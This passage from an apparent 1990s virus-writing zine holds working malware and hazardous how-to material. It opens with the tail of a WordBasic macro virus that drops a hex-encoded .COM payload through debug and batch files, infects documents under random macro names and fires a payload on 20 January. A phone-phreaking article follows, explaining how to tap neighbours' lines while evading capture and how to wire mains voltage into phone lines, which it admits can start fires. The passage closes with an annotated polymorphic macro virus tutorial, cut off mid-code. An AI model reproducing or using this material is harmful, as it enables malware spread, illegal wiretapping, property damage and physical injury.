Print #1, "E 0630 EB 1A CE 38 FC D6 FE CD E4 22 23 D3 5A 95 FA 98"
Print #1, "E 0640 92 66 FD BE E0 93 22 50 A8 46 BE FE 48 F0 CF 22"
Print #1, "E 0650 3E CB 2F AC 5A EA 0F EC 43 E3 DB D2 B9 54 AB 64"
Print #1, "E 0660 D2 7E FD B7 E8 8D 72 89 0E 18 1E EA 43 B0 3E 55"
Print #1, "E 0670 01 D3 EE FD 19 2A EE AF 52 93 E3 D2 CA 94 0B 85"
Print #1, "E 0680 0E 3A 7F CB 5F BD F7 D5 D7 45 AF 72 9D 46 7F E1"
Print #1, "E 0690 CC 38 7F F5 4D E5 0F C0 25 F1 E3 DA C1 94 C7 21"
Print #1, "E 06A0 F2 15 D7 DF DF AF 5D 5F 55 15 DF C5 CC FA 9F 0D"
Print #1, "E 06B0 9C 23 BF 86 BE 25 9F 72 EB FC A5 52 42 95 29 64"
Print #1, "E 06C0 4A 16 5F 7F FD D5 DF FD 7F 17 6F BF D5 53 BF 91"
Print #1, "E 06D0 41 12 5F 6E 8A 98 FF F7 92 EF E3 DA 42 79 48 DF"
Print #1, "E 06E0 4B 16 D7 77 F7 15 7F 5F D7 5F 7F 2B A0 F6 3F DA"
Print #1, "E 06F0 D3 57 EF B8 80 B9 0F AE 64 A9 DD C2 41 51 C9 23"
Print #1, "E 0700 21 1B F7 5F 5F 27 77 D7 F7 25 4F E7 60 9A 8F D5"
Print #1, "E 0710 A5 A2 5F 50 A1 D7 8F 09 C4 ED 4F 3A 2A 75 C0 8B"
Print #1, "E 0720 04 25 D9 77 DD 55 CF 8E 6F 25 7F 55 5E 53 2F A6"
Print #1, "E 0730 76 13 4F DE ED E1 AF 21 7C 1C D9 52 2A 71 29 D4"
Print #1, "E 0740 E9 2F 92 0D 57 1F B5 09 98 4F 0F 1A 5B 4C 7E 10"
Print #1, "E 0750 DC AA DF 24 28 EF 5F CB ED 94 9F DA 42 99 C9 27"
Print #1, "E 0760 31 28 DF 7F FD F6 5F 4A A0 6F 0E 89 C1 BD 9E 10"
Print #1, "E 0770 3A 07 9E FD 12 F8 0E A0 A9 49 25 63 B2 51 17 41"
Print #1, "E 0780 52 4C 1C EF FF EF 0A 4B 7D 45 FE B7 5B 46 2E 25"
Print #1, "E 0790 22 4B 7F DB 03 1A EE 68 5C 60 E1 4A D2 54 C4 ED"
Print #1, "E 07A0 26 76 03 AE 42 6F 66 77 29 79 2F 94 C1 CD AF 04"
Print #1, "E 07B0 99 B4 7E 71 0C 1A BF 5D DE FD E1 D2 CA 75 77 8F"
Print #1, "E 07C0 8A 24 5F 7D DD 6F 7D 5D DF 25 4F FC 5C DA 3F 92"
Print #1, "E 07D0 55 F7 BF 08 8E 89 7F 05 BE 0C 63 63 3A 75 DE D6"
Print #1, "E 07E0 2F 25 75 DD F7 2F FF 7F F7 25 3F 06 06 64 8F 33"
Print #1, "E 07F0 FA BF 6F 5E 14 6D CF A3 0E 27 A3 D3 32 95 AF 5A"
Print #1, "E 0800 EB 25 DD D5 7D 57 FF DF FD 2D 7F 53 86 CB 9F 6C"
Print #1, "E 0810 65 DD AF 32 7E 13 DF 68 6D 0E 23 D3 CA 74 09 5D"
Print #1, "E 0820 2B 27 55 D5 F7 6D F7 77 F7 27 6F A4 D9 04 CF 4A"
Print #1, "E 0830 F5 81 8F 52 CE 81 CF 6A C2 04 1B 63 2A 31 4A F8"
Print #1, "E 0840 8A 24 57 F5 75 FF 55 FF F5 1F DF 6A 70 23 BF 3E"
Print #1, "E 0850 B8 80 5F EF 40 A2 CF 6F 98 39 53 32 39 71 49 AD"
Print #1, "E 0860 5D 2E 57 57 49 1F 80 CB F5 37 7F DE 49 56 6F AE"
Print #1, "E 0870 3A 02 CF 7A E3 30 DE CC B4 99 61 E3 C9 74 17 D2"
Print #1, "E 0880 5F 72 F3 5D EF 95 5F B7 8A 6F FF A3 20 03 5E 52"
Print #1, "E 0890 D2 94 2E A4 95 22 4F 1D 4C 92 DF 5A C3 70 4A D8"
Print #1, "E 08A0 22 56 CA ED 6A 45 47 F7 87 2B 3E 67 A9 0D EE 9E"
Print #1, "E 08B0 D4 79 FE 52 00 66 7E 6B 76 AE E3 5B 3A 95 76 20"
Print #1, "E 08C0 FF 5E AA 3C 26 B2 3D 5F 3F 7B BF 6D DE 8E EE 84"
Print #1, "E 08D0 84 D3 DE 44 B4 0D BE 5A E4 F5 5D 53 B2 70 76 12"
Print #1, "E 08E0 31 29 FD 20 63 FD AD 57 AF 44 4E 26 FD AB 5E 65"
Print #1, "E 08F0 18 85 2E C9 B2 1F DE 00 FA 29 5D E3 B2 95 8E 53"
Print #1, "E 0900 64 24 F9 C7 F7 6F 7F 77 5F 15 9E E5 CA 19 AD 4E"
Print #1, "E 0910 7E DA 8F 82 96 F5 7F 06 76 08 A3 62 CC B8 EF 93"
Print #1, "E 0920 B0 18 57 77 FD FD 7F D5 FD 0F 7F 5D C6 7C 3F 88"
Print #1, "E 0930 4C 8A CF 3E 70 0F 9F 90 C4 1C E3 DA 54 99 23 57"
Print #1, "E 0940 6C 3F 7D DD 5F 07 57 DD 7F 1F 9F DC 64 94 5F 88"
Print #1, "E 0950 AB 9E CF 45 DC 11 7F A2 A3 5E 25 DB 42 D9 A1 1A"
Print #1, "E 0960 64 18 F5 F7 77 6D DF FD DF 17 4F 67 6C 3D 8F 21"
Print #1, "E 0970 9B 11 0F 50 B6 AC 4F 79 7E 5C E7 5A BB B9 3D A1"
Print #1, "E 0980 EE 14 FF 57 FD B5 FF 77 5F 5F 6F 4E 02 61 DF 72"
Print #1, "E 0990 36 C3 1F 8E 08 BF 7F B7 BA 15 A5 5B C2 94 5B B3"
Print #1, "E 09A0 F0 65 F7 DD FD A5 75 DF FD 1D 7F 61 DA 55 EF 29"
Print #1, "E 09B0 B4 70 2F 2F CB 62 9F ED 5D F8 21 6B CA 71 8C 0B"
Print #1, "E 09C0 6C 53 FD D5 57 75 D7 DF DF 7D 4F 1A 8B F0 0F AD"
Print #1, "E 09D0 31 CF 7F DA 68 99 FF 86 0C BB 21 D3 A1 70 C1 18"
Print #1, "E 09E0 71 75 FF 75 E6 B1 5B 9F 71 75 8F BF A4 D2 BF 46"
Print #1, "E 09F0 F9 32 3F 54 98 1B 7F 6B 26 09 A1 62 54 95 92 D5"
Print #1, "E 0A00 73 55 DD BF 80 CB AE 9F 2B 2F 7F E5 95 F2 0F 9A"
Print #1, "E 0A10 BD BD DF 7F 83 F6 7F 64 D6 11 21 E3 BA 98 31 18"
Print #1, "E 0A20 26 76 FC D7 CF 1D AB 89 F6 1F CE 28 FD 13 3E 32"
Print #1, "E 0A30 DB 9E BF CD DD 5B 3E 70 76 AE A3 5A CB 70 F6 23"
Print #1, "E 0A40 11 56 C8 B3 6A C4 FE F5 7F 37 6F C7 32 CB DF 5A"
Print #1, "E 0A50 8B C8 BE 4E 64 A4 4E FA AD F5 61 DB 32 95 9B 5A"
Print #1, "E 0A60 2D 26 5C 7F E6 36 E8 AE A3 28 7E 71 98 9C 9F 7C"
Print #1, "E 0A70 3B 64 BF 7B 8A 03 5E 89 6B 02 DF D2 B1 90 C9 20"
Print #1, "E 0A80 F1 22 54 26 EB BD 82 0B 02 1F BE FB 33 1D DE F1"
Print #1, "E 0A90 3B 85 CE 47 B8 38 1E E1 E9 C3 23 63 43 91 A4 8E"
Print #1, "E 0AA0 1D 56 A8 2D 30 AB 9A 7D 9F 5D 5F 66 60 88 8F 5F"
Print #1, "E 0AB0 F9 7D 6F 53 34 14 2E 72 0D D1 5F 6B B2 94 C9 14"
Print #1, "E 0AC0 B2 55 FF FF 3F 49 7D DD DD 2D 2E 8A CE E2 7F AF"
Print #1, "E 0AD0 96 87 4F 2C 15 9B 0F 65 C2 1E 65 EB 3A B5 70 BD"
Print #1, "E 0AE0 AB 58 77 D7 D7 0D D5 75 FF 2F 0F 0C 99 C7 9F D6"
Print #1, "E 0AF0 E5 D3 6F 76 F2 E5 FF 6A 54 5F A3 5B 3B 99 27 63"
Print #1, "E 0B00 0A 2D 57 FF DD 7F DD D7 FF 55 BF EA 7A 00 3F CA"
Print #1, "E 0B10 09 5A CF F0 25 30 AF AC 1E 42 61 EB 33 99 29 E0"
Print #1, "E 0B20 45 29 F5 F7 F7 3D 77 7F FD 65 DF A4 1E 9C CF A0"
Print #1, "E 0B30 CE 37 2F 0F E4 C7 1F 60 AA 2D E1 EB C2 99 1F 59"
Print #1, "E 0B40 EB 68 F5 DD 77 E7 F5 FF F5 2F BF 58 56 30 7F 9A"
Print #1, "E 0B50 6E 1E 0F 47 98 2F DF 22 28 9B 61 E3 C3 B9 83 5A"
Print #1, "E 0B60 AD 35 57 1F 62 1D 57 7F 5D 35 FF 51 5C 32 8F 87"
Print #1, "E 0B70 FC 76 BF 4F 28 7E 6F 5A C5 09 5F F3 C9 9D 9C 27"
Print #1, "E 0B80 61 73 7F DD FF A7 D8 DD D7 2D 4F DB 9C 06 1F 10"
Print #1, "E 0B90 F0 10 2F 3E 62 0F 2F 08 61 EB 61 6B B2 B9 2E D7"
Print #1, "E 0BA0 20 39 DF F7 75 B6 F5 D7 DD 3F 6F A4 08 DD 1F 69"
Print #1, "E 0BB0 A6 66 6F CF 53 1E DF 8F 04 E5 1D 6B 5B 75 2F 61"
Print #1, "E 0BC0 8D 38 DD 7F 55 9D 7E 9F 8D 34 FF 21 0A B1 AF 07"
Print #1, "E 0BD0 6E 36 0F A2 CA 57 8F A4 01 84 E1 63 33 BD BC 54"
Print #1, "E 0BE0 56 3B 5D FF FF CD 55 F7 CB 3E 9F 1A 00 F5 1F 2D"
Print #1, "E 0BF0 73 0A 1F B0 BE 30 2F F6 BA EC 23 64 33 DD C0 1E"
Print #1, "E 0C00 F0 39 15 7F D5 DC F7 9F FB 37 6F 9D 62 6C 4F A5"
Print #1, "E 0C10 5D 28 BF 03 73 B9 AF 33 F8 98 61 EC 41 99 AA D2"
Print #1, "E 0C20 89 34 B6 75 5F 06 E2 3D 63 4E 1F 4E 23 F9 EF 4B"
Print #1, "E 0C30 6E CB 5F 87 B0 88 4F 26 42 E2 1F E4 B2 BD C9 E2"
Print #1, "E 0C40 9F 33 5D EE C8 E4 BB 7F 05 5D 1F 22 79 F3 1F B0"
Print #1, "E 0C50 D6 DD 8F 0F 4C 8F 2F 8C 66 92 9F 6B B4 BD 7C B1"
Print #1, "E 0C60 C7 46 EE 84 E3 4D FF 91 6A 4A 8F 1E 02 01 2F 1C"
Print #1, "E 0C70 80 DF CF D3 1B 05 9F 86 5A 09 1F 6C 51 DA 2B 7E"
Print #1, "E 0C80 8D 50 5D 55 C4 8F 9F AB 2A 79 9F B6 C2 CE 0E 26"
Print #1, "E 0C90 81 89 9F 9B DE 73 1F 90 EE 9B DF DC 3A BE 42 A1"
Print #1, "E 0CA0 40 48 6A B4 63 8D A7 BF B2 4A 6F 5C 13 A3 EE 52"
Print #1, "E 0CB0 F6 E3 6E B8 C4 C4 7F C7 49 29 5D 6B D3 BD 0C 9D"
Print #1, "E 0CC0 0B 43 3B DD 62 97 FD AC 63 4F 4E 57 10 8E 6F 3B"
Print #1, "E 0CD0 69 4F 6F A8 0C 15 AF 0C C6 EB DF EB D1 B9 3D 2D"
Print #1, "E 0CE0 2C 58 50 15 D9 4C D5 FD FF 61 CF 21 01 31 2F 1D"
Print #1, "E 0CF0 61 A4 BE 10 D8 FA AE 88 E8 BE 1F 64 C2 99 1A 64"
Print #1, "E 0D00 32 45 ED 9F 94 C9 0E 7D F7 4D BE 30 BC 94 2F E8"
Print #1, "E 0D10 5D 82 0E 9C 7A 4D 9E D0 EB E5 1F EC BA BD 40 62"
Print #1, "E 0D20 E0 4D 36 7F 46 D1 8A F0 3F 4B CE A6 4E 1F 7E 25"
Print #1, "E 0D30 E5 53 4F 61 B4 FE AE A0 A0 86 E1 64 61 B9 C8 F1"
Print #1, "E 0D40 06 48 FF 57 1F 02 42 80 B0 5A FE DE 41 E4 EE 86"
Print #1, "E 0D50 D8 B2 2F 84 CE 88 3F 1D E8 E4 1F 64 CA 9A 8B 56"
Print #1, "E 0D60 D1 5C 9A 9F C0 4B 14 7F 3A 55 2E 13 0D BF 3F A9"
Print #1, "E 0D70 8B 73 EE CE 1C F1 9E 87 30 03 A1 D4 CA BD B5 7A"
Print #1, "E 0D80 69 55 3A D8 1F 79 7D D5 FF 5D 9F D7 65 80 AE 44"
Print #1, "E 0D90 CA 6E FE E5 9D CD 0D F9 FC 26 E3 EB 32 B9 02 62"
Print #1, "E 0DA0 03 1D 3B 04 68 AA 02 F7 B9 5F 7F 4A 11 A1 7F 3F"
Print #1, "E 0DB0 5A 92 CF 41 D4 8E AF BD 85 F8 61 E4 41 99 AB A0"
Print #1, "E 0DC0 3D 55 8E 4A 9D CB EB 99 E6 5F AF 32 26 D6 8E F0"
Print #1, "E 0DD0 9A 31 FD 17 9B 1D 6F 03 AD 3A E1 6B 2A 96 88 D8"
Print #1, "E 0DE0 8A 55 89 3F DD 04 82 9F 12 68 4F AF 34 BC 0E FE"
Print #1, "E 0DF0 5B BD DE 4B BB 91 7F 9E 50 CC 5B DC D3 99 2B 5B"
Print #1, "E 0E00 0C 56 6F 97 DF FB 9A D9 00 59 FD F4 18 AD BE 4F"
Print #1, "E 0E10 00 F9 6D F1 A1 B5 6E 49 50 F2 5D 6B C2 99 10 24"
Print #1, "E 0E20 F1 54 FD AE 6F 09 EA 3D 02 69 6D EC C2 B1 6E F3"
Print #1, "E 0E30 E3 8A EE 0A 85 87 3F 05 8C D5 17 6C 53 95 DA E4"
Print #1, "E 0E40 86 33 32 A2 BA BF 21 94 AA 66 2E DF 01 C5 DD 61"
Print #1, "E 0E50 AC 77 9E 78 31 18 1E CC 69 B9 9B 63 4A 99 12 DB"
Print #1, "E 0E60 43 29 C3 7D 9D 8B EA 85 D8 73 9C 17 09 50 3E 02"
Print #1, "E 0E70 C6 D9 3E 43 5B 25 3D 31 10 9B 1D 5C C2 75 9B 77"
Print #1, "E 0E80 8C 48 02 41 F7 BF 0A C5 9D 4B 7E 3F 61 F7 6D 26"
Print #1, "E 0E90 05 92 2D 7E 4A D0 7C 3A 78 A2 1F 64 C2 BD 12 20"
Print #1, "E 0EA0 71 6E 7D 63 89 EA BB 9B 90 3F CD 15 A1 4C 8E 69"
Print #1, "E 0EB0 76 84 3C 15 00 9E 6C 05 80 5D 1F EC C9 BD 27 D8"
Print #1, "E 0EC0 AA 3B 8B 7F A5 66 C3 CE 8A 26 AD 49 AD A8 2C B0"
Print #1, "E 0ED0 33 DB 8C 1F 81 9B EC D7 E9 82 21 EC 31 9A 28 B3"
Print #1, "E 0EE0 37 66 0A 51 E0 9A E3 1F A8 5D 7D 83 28 8E FD EE"
Print #1, "E 0EF0 91 27 2C 8C 6B 13 7D AC F0 C9 9F E4 C1 79 0B A2"
Print #1, "E 0F00 12 05 B5 CA BF 77 28 FF EA 77 CC 46 6A 80 BC 35"
Print #1, "E 0F10 D3 26 EC 69 48 97 FC CC E2 68 DD EB C2 BD E8 60"
Print #1, "E 0F20 6C 7F CA 94 64 7B 83 95 6B 47 1D A6 B5 07 9C 47"
Print #1, "E 0F30 04 20 1B 91 2B 75 0B E8 2B CB"
Print #1, "RCX"
Print #1, "0E3A"
Print #1, "W"
Print #1, "Q"
Close #1
Open G$ + "Sounda.bat" For Output As #1
Print #1, "@echo off"
Print #1, "debug < " + G$ + "laugh.scr > nul"
Close #1
Shell G$ + "Sounda.bat", 0
n = Seconde(Maintenant())
Timer = n + 25
If Timer > 59 Then Timer = Timer - 60
While Seconde(Maintenant()) <> Timer
Wend
Beep
Open G$ + "Rename.bat" For Output As #1
Print #1, "@echo off"
Print #1, "copy laugh.com laugh.wav"
Close #1
Shell G$ + "Rename.bat", 0
n = Seconde(Maintenant())
Timer = n + 5
If Timer > 59 Then Timer = Timer - 60
While Seconde(Maintenant()) <> Timer
Wend
Beep
Finish:
End Sub
---------------------------
Macro M8908
PURPOSE : Infected a document
Test if the payload macro must be launch
Sub MAIN
On Error Goto Finish
A$ = NomFichier$()
If A$ = "" Then Goto Finish
UZ$ = GetProfileString$("Intl", "Name")
ZU$ = GetProfileString$("Intl", "Name2")
ZUZ$ = GetProfileString$("Intl", "Name3")
If CheckInstalledDoc = 1 Then
Goto Finish
Else
On Error Resume Next
FichierEnregistrerSous .Format = 1
Routine
Crypt
PayloadMakro
FichierEnregistrerTout 1, 0
End If
Finish:
A$ = NomFichier$()
If A$ = "" Then
Goto Finito
Else
Insertion "e"
End If
Finito:
If Mois(Maintenant()) = 1 And Jour(Maintenant()) = 20 Then
Goto Payload
Else
Goto NO
End If
Payload:
-> test if it's the version 7.0 of WINWORD
If (InStr(AppInfo$(1), "Macintosh") > 0) Then Goto NO
If (InStr(AppInfo$(1), "Windows 3.") > 0) Then Goto NO
If Left$(AppInfo$(2), 1) = "6" Then
Goto NO
Else
Goto YES
End If
YES:
WordVer = Val(Left$(AppInfo$(2), 1))
AL$ = Str$(WordVer)
AL$ = LTrim$(AL$)
If AL$ = "7" Then
Goto Payload_Start
Else
Goto NO
End If
Payload_Start:
AK$ = GetProfileString$("Intl", "Name3")
OutilsMacro .Nom = AK$, .ExÈcuter, .Afficher = 0, .Description = "", .NouvNom = ""
NO:
End Sub
Sub Crypt
-> sub-program to create the name of the macro number 2 and copy to a new file
One = 7369
Two = 9291
Num = Int(Rnd() * (Two - One) + One)
A$ = Str$(Num)
A$ = LTrim$(A$)
Beginn = Heure(Maintenant())
B$ = Str$(Beginn)
B$ = LTrim$(B$)
If B$ = "1" Then C$ = "A"
If B$ = "2" Then C$ = "B"
If B$ = "3" Then C$ = "C"
If B$ = "4" Then C$ = "D"
If B$ = "5" Then C$ = "E"
If B$ = "6" Then C$ = "F"
If B$ = "7" Then C$ = "G"
If B$ = "8" Then C$ = "H"
If B$ = "9" Then C$ = "I"
If B$ = "10" Then C$ = "J"
If B$ = "11" Then C$ = "K"
If B$ = "12" Then C$ = "L"
If B$ = "13" Then C$ = "M"
If B$ = "14" Then C$ = "N"
If B$ = "15" Then C$ = "O"
If B$ = "16" Then C$ = "P"
If B$ = "17" Then C$ = "Q"
If B$ = "18" Then C$ = "R"
If B$ = "19" Then C$ = "S"
If B$ = "20" Then C$ = "T"
If B$ = "21" Then C$ = "U"
If B$ = "22" Then C$ = "V"
If B$ = "23" Then C$ = "W"
If B$ = "00" Then C$ = "X"
E$ = C$ + A$
ZU$ = GetProfileString$("Intl", "Name2")
MacroCopie "Global:" + ZU$, NomFenÍtre$() + ":" + E$
DÈfinitVarDocument "VirNameDoc", E$
OutilsPersonnaliserClavier .CodeTouche = 69, .CatÈgorie = 2, .Nom = E$, .Ajouter, .Contexte = 1
End Sub
Sub Routine
-> sub-program to create the name of the macro number 1 and copy to a new file
One = 7369
Two = 9291
Num = Int(Rnd() * (Two - One) + One)
A$ = Str$(Num)
A$ = LTrim$(A$)
Beginn = Heure(Maintenant())
B$ = Str$(Beginn)
B$ = LTrim$(B$)
If B$ = "1" Then C$ = "A"
If B$ = "2" Then C$ = "B"
If B$ = "3" Then C$ = "C"
If B$ = "4" Then C$ = "D"
If B$ = "5" Then C$ = "E"
If B$ = "6" Then C$ = "F"
If B$ = "7" Then C$ = "G"
If B$ = "8" Then C$ = "H"
If B$ = "9" Then C$ = "I"
If B$ = "10" Then C$ = "J"
If B$ = "11" Then C$ = "K"
If B$ = "12" Then C$ = "L"
If B$ = "13" Then C$ = "M"
If B$ = "14" Then C$ = "N"
If B$ = "15" Then C$ = "O"
If B$ = "16" Then C$ = "P"
If B$ = "17" Then C$ = "Q"
If B$ = "18" Then C$ = "R"
If B$ = "19" Then C$ = "S"
If B$ = "20" Then C$ = "T"
If B$ = "21" Then C$ = "U"
If B$ = "22" Then C$ = "V"
If B$ = "23" Then C$ = "W"
If B$ = "00" Then C$ = "X"
D$ = C$ + A$
UZ$ = GetProfileString$("Intl", "Name")
MacroCopie "Global:" + UZ$, NomFenÍtre$() + ":" + D$
DÈfinitVarDocument "VirName", D$
OutilsPersonnaliserClavier .CodeTouche = 32, .CatÈgorie = 2, .Nom = D$, .Ajouter, .Contexte = 1
End Sub
Sub PayloadMakro
-> sub-program to create the name of the macro number 3 (payload) and copy to a new file
One = 7369
Two = 9291
Num = Int(Rnd() * (Two - One) + One)
A$ = Str$(Num)
A$ = LTrim$(A$)
Beginn = Heure(Maintenant())
B$ = Str$(Beginn)
B$ = LTrim$(B$)
If B$ = "1" Then C$ = "A"
If B$ = "2" Then C$ = "B"
If B$ = "3" Then C$ = "C"
If B$ = "4" Then C$ = "D"
If B$ = "5" Then C$ = "E"
If B$ = "6" Then C$ = "F"
If B$ = "7" Then C$ = "G"
If B$ = "8" Then C$ = "H"
If B$ = "9" Then C$ = "I"
If B$ = "10" Then C$ = "J"
If B$ = "11" Then C$ = "K"
If B$ = "12" Then C$ = "L"
If B$ = "13" Then C$ = "M"
If B$ = "14" Then C$ = "N"
If B$ = "15" Then C$ = "O"
If B$ = "16" Then C$ = "P"
If B$ = "17" Then C$ = "Q"
If B$ = "18" Then C$ = "R"
If B$ = "19" Then C$ = "S"
If B$ = "20" Then C$ = "T"
If B$ = "21" Then C$ = "U"
If B$ = "22" Then C$ = "V"
If B$ = "23" Then C$ = "W"
If B$ = "00" Then C$ = "X"
K$ = C$ + A$
ZUZ$ = GetProfileString$("Intl", "Name3")
MacroCopie "Global:" + ZUZ$, NomFenÍtre$() + ":" + K$
DÈfinitVarDocument "VirNamePayload", K$
End Sub
Function CheckInstalledDoc
-> test if the file is still infected
On Error Resume Next
CC$ = LitVarDoc$("VirNameDoc")
CheckInstalledDoc = 0
If CompteMacros(1) > 0 Then
For i = 1 To CompteMacros(1)
If NomMacro$(i, 1) = CC$ Then
CheckInstalledDoc = 1
End If
Next i
End If
End Function
-------------------------------------------------
Hacking Division
by Liquid Cool
Intro
Sup. I am Liquid Cool. I am new to VBB for about a week or so. Dark Knight made me president of the hacking/phreaking division. Each issue I will be writting about hacking and/or phreaking. So if you have any questions or you want to joining my division just mail me at "LCooL@juno.com" All of you probably know about how my group got busted up. What you may not know is that Dark Fierce is still around. He doesn't hack at all but still phreaks and has been programming in VB 4.0 and 3.0 for a while. I just wanna say wus up to: Dark Fierce, Coals of Fire, Acid Fallout, and DJ Shine.
Bud Box
I'll just explain how to build some easy phreaking tools. My favorite way to tap a fone is the Bud Box by Dr. D-Code & The Pimp. This is a very simple box to build and very simple to install. Here's how you do it. First get a piece of fone cord, cut the end off, then, strip the most outer wire off so that you have the red, green, black, and yellow wires sticking out. You won't need the black or yellow wires so you can cut them off or you can use them to build a busy box. Now that you have done that you should have a red and green wire sticking out. Strip the outer wire off those, now connect them to alligator clips and walla! You have a Bud Box!
Installation
Go out two someone's house and look for a medium sized grey colored box. All you need is a screwdriver ( any kind of screwdriver will do fine) to open it up and get full access to their fones from the outside. For the bigger boxes any screwdriver will do as well. I have heard much about needing a tool called a 40 hex for this. That is not true, but to use most boxes you won't need it. Okay, open up their fone box and inside you should see a fone cord leading into a jack, if you unplug it they can't use their fones, but don't do that. Close to it you should see screws with the following colors on them: red, green, yellow, and black. Concentrate on the red and green screws. Usually you can find a little bit of exposed wire leading in or out of one of the screws. If you can find it on both you've got it made. If you can't skip down to the next section. If you can just clip the red alligator clip on the red screw and the green alligator clip on the green screw. Now plug the other end of your cord into a working fone and listen for a dial tone or some people talking. BE QUIT! They can hear you. My favorite place to go boxing is apartments. Another kewl thing to do is switch their fone lines around! Everything will be normal but their fone number. I also like hooking that up to my modem or fone and making long distance calls to bbs and shit like that.
This section is for if you don't have the exposed wire. Unscrew the screw just enough so that you can clip the alligator clip on. Then when you have enough space clip it on. Then you should hear an dial tone or people talking. By the way... opening anyone's but your own fone box is illegal. He he.
Bud Box Schematics
_______
Fone -> | ..... |
| ::::: |
| | (+) (+)
| 1 2 3 | (+) (+)
| 4 5 6 | : *
| 7 8 9 | : *
| * 0 # | : *
| | |
| ::: | |
|_______| |
| |
-------------------
Legend
| or - = Fone Wire
: = Green Wire
* = Red Wire
(+) = Alligator Clip
I appologize for the crudity of these schematics but it isn't an easy thing to do.
Bud Box Tips
- Do it at night.
- Wear black.
- Bring a SMALL flashlight so you can see what the hell you are doing, but make sure that the flashlight is not so bright that it will wake the people up.
- Wear gloves so you don't get your fingerprints on the fone box.
- Bring a long extension fone cord so that you are not close to the house when you are talking... you might wake the people up.
- Make sure you have running shoes on in case you get caught. If you get caught you better run like hell. A couple of my friends have been grabbed and taken into the house.
- Don't take any ID with you like a driver's license in case you get caught. You don't want people to know your real name and address.
- (Optional) I would recommend wiping the box clean if you don't wear gloves. Again so you don't leave finger prints.
- And most important of all... be QUIET! At night it is very quiet and people can easily hear you, especially if your standing right next to their house.
Instead of unhooking their fone cord to disconnect their fone... you can just take a piece or the black or yellow wire out of a fone cord and connect one end to the red screw and one end to the green screw. That will also disconnect their fone and won't look as obvious when/if they look in their fone box to find out why they can't use their fones.
And in case any of you are wondering what the hell I was talking when I said you can switch around their fone numbers... it only works when they have more than one line. For every line they have there will be another plug for that line. Each normal sized fone box has a capacity of 6 lines. Just unplug the lines and switch them around. They probably won't notice until they start getting strange calls from people they don't know.
Rainbow Box
"Rainbow Box: SUPPOSEDLY non-existant. Kills trace by putting 120v into the phone lines, SUPPOSEDLY!" (Exerpt from a phile found on BBS, author unknown)
The above sums up what a Rainbow box does, but it is VERY understated. It is a VERY powerful box capable of doing a great amount of damage to both the fone lines, your fone and the person at the other end of the line's fone and/or modem. Right now you have everything you need to build one, so let's see how.
You'll need:
- 1 Fone (Rotery with access to the mouth part)
- 1 Extention Cord (120v or 220v, your choice)
- 1 Wall outlet
- 1 Wire splicer
Okay... now unscrew the mouth part of the phone and take the speaker off. You'll see two wires, a red wire and a black wire. Now splice the extention cord, you'll see a red wire and a black wire. Splice the black wire in the cord to the black wire in the phone, do the same with the red. There you have it. You just made a non-existant Rainbow Box! Don't you feel special?
How to use: Plug the fone in and then plug the extension cord in. BE CAREFUL! 120v isn't enough to kill you but it just might make you piss your pants.
How it works: The phone lines can resist a charge of 6v and a little more, when you plug in that cord, you're sending 120v or 220v through the lines. It blows out everything, but it is non-selective. Odds are you will take out every phone in the neighborhood and get caught. It will melt the phone if you let it go long enough. WARNING: THIS DEVICE CAN VERY EASILY START A FIRE, BE CAREFUL WHEN PLAYING AROUND WITH THIS!
Well I'll probably be writing about hacking in the next VBB issue.
Until then peace out.
Liquid Cool
-LCooL@juno.com
POLYMORPHISM IN MACRO VIRII
You maybe already heard something about polymorphism in macro virii. The first macro virus that uses this technique was the Outlaw virus. The way it is polymorphic is that it changes it's macro names every infection and stores them (the macro names) in win.ini. If Word is restarted, it reads the names of the macro from win.ini. To use them in your macros you need to read them and set them into strings like name1$, name2$, etc.
The names that are generated are just a charachter + number, something like A326 or maybe RT898763. The reason that it uses characters plus numbers is because Word can only use macros that begin with a character. After the character there can be numbers too. That's done because of the fact that numbers are easy to generate in Word. Just use some random function to generate a random number. But if Word generates a number there is always an open space before the number because that is used for making the number negative. i.e. if the generated number is "12345" it actually is " 12345". There is a function that deletes that open space. Its Ltrim. You will see how it works in the example.
I hope you get it, and else don't worry but read the file again. And now , the moment you've all been waiting for :) the code for making a poly-morfic macro virus.
This is an example of the code the Outlaw virus uses.
---------The Macro for creating random names---------------
Sub MAIN
On Error Goto Done '<Error handler.>
A$ = FileName$() '<A$ = active filename.>
If A$ = "" Then Goto Finish '<If no file active goto finish.>
If CheckInstalled = 0 Then '<Already installed?...>
Routine '<No then goto Sub Routine,
Crypt ' Sub Crypt, Sub PayLoadMakro,
PayloadMakro ' etc.>
FileSaveAll 1, 1
Else '<Yes (already installed).>
Goto Done '<Goto done.>
End If
Done: '<Done (already installed).>
A$ = FileName$() '<A$ = active filename.>
If A$ = "" Then '<If no file active goto finish.>
Goto Finish
Else '<If a file is active,
Insert " " ' insert a "space", for infecting
' the active file.>
End If
Finish: '<Finish (no file active).>
End Sub
Sub Crypt '<The Sub Crypt.>
One = 7369 '<Number one is 7369.>
Two = 9291 '<Number two is 9291.>
Num = Int(Rnd() * (Two - One) + One) '<generate random number.>
A$ = Str$(Num) '<A$ is generated number.>
A$ = LTrim$(A$) '<Delete the empty space before...
' the number. The empty space is...
' for making the number negative,
' e.g. -7369.>
Beginn = Hour(Now()) '<Beginn is the active hour.>
B$ = Str$(Beginn) '<B$ is the active hour (string).>
B$ = LTrim$(B$) '<Delete the empty space in B$.>
If B$ = "1" Then C$ = "A" '<If B$ is 1 (1 o'clock)...
' then C$ is A.>
If B$ = "2" Then C$ = "B" '<If B$ is 2 (2 o'clock)...
' then C$ is B.>
If B$ = "3" Then C$ = "C" '<If B$ is 3 (3 o'clock)...
' then C$ is C.>
If B$ = "4" Then C$ = "D" '<Etc.>
If B$ = "5" Then C$ = "E"
If B$ = "6" Then C$ = "F"
If B$ = "7" Then C$ = "G"
If B$ = "8" Then C$ = "H"
If B$ = "9" Then C$ = "I"
If B$ = "10" Then C$ = "J"
If B$ = "11" Then C$ = "K"
If B$ = "12" Then C$ = "L"
If B$ = "13" Then C$ = "M"
If B$ = "14" Then C$ = "N"
If B$ = "15" Then C$ = "O"
If B$ = "16" Then C$ = "P"
If B$ = "17" Then C$ = "Q"
If B$ = "18" Then C$ = "R"
If B$ = "19" Then C$ = "S"
If B$ = "20" Then C$ = "T"
If B$ = "21" Then C$ = "U"
If B$ = "22" Then C$ = "V"
If B$ = "23" Then C$ = "W"
If B$ = "00" Then C$ = "X"
E$ = C$ + A$ '<E$ is C$ (character) plus...
' A$ (the generated number).>
ZU$ = GetDocumentVar$("VirNameDoc") '<ZU$ is macro called VirNameDoc...
' Watch out:VirNameDoc is not...
' the real macro name, it's some...
